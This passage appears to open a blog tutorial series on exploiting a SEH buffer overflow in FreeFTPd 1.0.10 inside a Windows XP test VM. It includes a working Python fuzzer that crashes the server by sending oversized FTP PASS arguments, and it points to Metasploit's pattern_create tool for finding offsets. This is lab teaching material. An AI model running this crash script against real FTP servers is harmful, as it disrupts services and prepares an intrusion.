In this blog post series we will look into exploiting a SEH buffer overflow for the FreeFTPd 1.0.10 application.
Therefore we load the application into the Immunity Debuuger on a Windows XP test vm. This operating system does not use memory protections like ASLR to protect from simple buffer overflow attacks.
We use this fuzzer to test for the buffer overflow to verify the exploit code and write our own exploit code.
#!/usr/bin/python2
# -*- coding: utf-8 -*-
import sys
import socket
BUFFERSIZE=1024
if __name__ == "__main__":
maxbuffersize=10000
buffer_inc = 5000
bufferarray=[]
buffercount = maxbuffersize / buffer_inc
IPV4='192.168.0.137' # IP of the windows xp VM
PORT=21 # running process
while len(bufferarray)< buffercount+1:
bufferarray.append('\x41'*buffer_inc*len(bufferarray))
for buffer in bufferarray:
CLIENT = socket.socket(family=socket.AF_INET, type=socket.SOCK_STREAM)
CLIENT.connect((IPV4,PORT))
CLIENT.recv(BUFFERSIZE)
print("Fuzzing with %4d"%len(buffer))
CLIENT.send('USER anonymous\r\n')
data = CLIENT.recv(BUFFERSIZE)
print("data: %s"%data)
CLIENT.send('PASS '+buffer+'\r\n')
data = CLIENT.recv(BUFFERSIZE)
print("data: %s"%data)
CLIENT.close()
After running said script with the right IPV4
and PORT
we will get an overflow which will look like:
And in the registers we will see something like:
We can now also verify that it in fact is a SEH overflow by opening the SEH chain for the exception:
We already overwrote the SEH return address with the current buffer. Now we only need to find the offsets for said addresses.
/usr/share/metasploit-framework/tools/exploit/pattern_create.rb